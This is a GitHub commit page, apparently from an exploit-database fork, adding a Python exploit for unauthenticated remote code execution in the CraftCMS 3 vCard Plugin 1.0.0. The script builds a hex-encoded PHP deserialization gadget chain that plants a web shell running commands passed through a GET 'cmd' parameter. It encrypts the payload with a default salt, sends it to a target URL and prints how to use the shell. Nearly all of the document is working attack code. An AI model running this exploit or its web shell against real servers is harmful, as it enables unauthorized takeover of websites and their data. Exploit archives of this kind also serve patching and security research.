forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
1 changes to exploits/shellcodes CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution
- Loading branch information
Offensive Security
committed
May 21, 2020
1 parent
6bdc0c9
commit b76fd66
Showing
2 changed files
with
61 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,60 @@ | ||
| # Exploit Title: CraftCMS 3 vCard Plugin 1.0.0 - Remote Code Execution | ||
| # Date: 2020-05-18 | ||
| # Exploit Author: Wade Guest | ||
| # Vendor Homepage: https://craftcms.com/ | ||
| # Software Link: https://plugins.craftcms.com/vcard | ||
| # Vulnerability Details: https://gitlab.com/wguest/craftcms-vcard-exploit | ||
| # Version: 1.0.0 | ||
| # Tested on: Ubuntu 19.10 / PHP 7.3.11 | ||
| # Description: CraftCMS 3 vCard Plugin 1.0.0 - Deserialization to RCE | ||
|
|
||
| #!/usr/bin/env python3 | ||
|
|
||
| import sys | ||
| import argparse | ||
| import subprocess | ||
| import requests | ||
|
|
||
| DEFAULT_PAYLOAD = "613a323a7b693a373b4f3a33313a2247757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a6172223a343a7b733a34313a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720066696c656e616d65223b733a%s3a222e2f%s223b733a35323a220047757a7a6c65487474705c436f6f6b69655c46696c65436f6f6b69654a61720073746f726553657373696f6e436f6f6b696573223b623a313b733a33363a220047757a7a6c65487474705c436f6f6b69655c436f6f6b69654a617200636f6f6b696573223b613a313a7b693a303b4f3a32373a2247757a7a6c65487474705c436f6f6b69655c536574436f6f6b6965223a313a7b733a33333a220047757a7a6c65487474705c436f6f6b69655c536574436f6f6b69650064617461223b613a333a7b733a373a2245787069726573223b693a313b733a373a2244697363617264223b623a303b733a353a2256616c7565223b733a36373a223c7072653e3c3f70687020696628697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b202020207d203f3e0a223b7d7d7d733a33393a220047757a7a6c65487474705c436f6f6b69655c436f6f6b69654a6172007374726963744d6f6465223b4e3b7d693a373b693a373b7d" | ||
|
|
||
| def generatePayload(fname): | ||
| fname_hex = str(fname).encode('utf-8').hex() | ||
| fname_len_hex = str(len(fname)+2).encode('utf-8').hex() | ||
| payload = DEFAULT_PAYLOAD % (fname_len_hex,fname_hex) | ||
| return payload | ||
|
|
||
|
|
||
| def exploitCard(url,payload): | ||
| malicious_url = url + payload.decode() | ||
| r = requests.get(malicious_url,verify=False) | ||
|
|
||
| return r.status_code | ||
|
|
||
| def encryptPayload(payload,salt): | ||
| phpcomm = """$string=hex2bin("%s");$key = "%s";$key = md5( $key );$iv = substr( md5( $key ), 0, 16);echo rtrim(strtr(base64_encode(openssl_encrypt( $string, "aes128", md5( $key ), true, $iv )),"+/", "-_"), "=");""" % (payload,salt) | ||
| result = subprocess.run(['php','-r',phpcomm],stdout=subprocess.PIPE) | ||
| return result.stdout | ||
|
|
||
|
|
||
| def main(): | ||
| parser = argparse.ArgumentParser(description="Unauthenticated RCE for CraftCMS vCard Plugin") | ||
| parser.add_argument('-u',dest='url',required=True,help="The URL for the vCard download without the vCard value\nExample: http://craftcms/index.php?p=actions/vcard/default/index&vcard=") | ||
| parser.add_argument('-s',dest='salt',default="s34s4L7",help="Security key required for encrypting payload. Defaul is 's34s4L7'") | ||
| parser.add_argument('-f',dest='fname',default="shell.php",help="File path/name to use as value in upload path: ./<value> . Use a PHP extension. Default value is 'shell.php'") | ||
|
|
||
| if len(sys.argv)<3: | ||
| parser.print_help() | ||
| sys.exit(0) | ||
|
|
||
| args = parser.parse_args() | ||
|
|
||
| attPayload = generatePayload(args.fname) | ||
|
|
||
| serPayload = encryptPayload(attPayload,args.salt) | ||
| if exploitCard(args.url,serPayload) == 500: | ||
| print("Deserialization has been triggered, navigate to craftCMS webroot/"+ args.fname +"\nUse GET parameter 'cmd' to execute commands\nExample: https://craftcms/"+ args.fname +"?cmd=ls%20-al;whoami;ip%20a\n") | ||
|
|
||
|
|
||
| if __name__ == '__main__': | ||
| main() | ||
| sys.exit(0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters